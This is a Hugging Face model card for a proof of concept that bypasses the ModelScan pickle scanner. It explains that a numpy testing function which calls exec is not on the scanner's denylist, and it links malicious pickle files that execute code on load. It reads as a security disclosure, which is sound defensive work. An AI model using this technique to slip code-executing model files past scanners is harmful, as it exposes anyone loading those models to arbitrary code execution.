Hugging Face's logo

TheAuroraAi
/
modelscan-bypass-poc

security-research
Model card Files
xet
 Community

ModelScan Bypass PoC

Summary

Demonstrates a bypass of ProtectAI ModelScan (v0.8.8). The pickle files achieve arbitrary Python code execution during deserialization while ModelScan reports no issues.

Details

numpy.testing._private.utils.runstring calls exec(code_string, dict). This function is NOT on ModelScan denylist, allowing malicious pickles using it to bypass detection.

Files

  • poc_modelscan_bypass.pkl: Malicious pickle (538 bytes)
  • poc_modelscan_bypass.bin: Same payload with .bin extension (PyTorch naming)

Reproduction

Install modelscan, scan the file (reports no issues), then load it (executes code).

Impact

Any pickle model using numpy.testing._private.utils.runstring bypasses ModelScan. The .bin variant also bypasses PyTorchUnsafeOpScan (format routing gap).

Note

Safe payload only: creates a proof text file. Same technique can execute any Python code.

Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support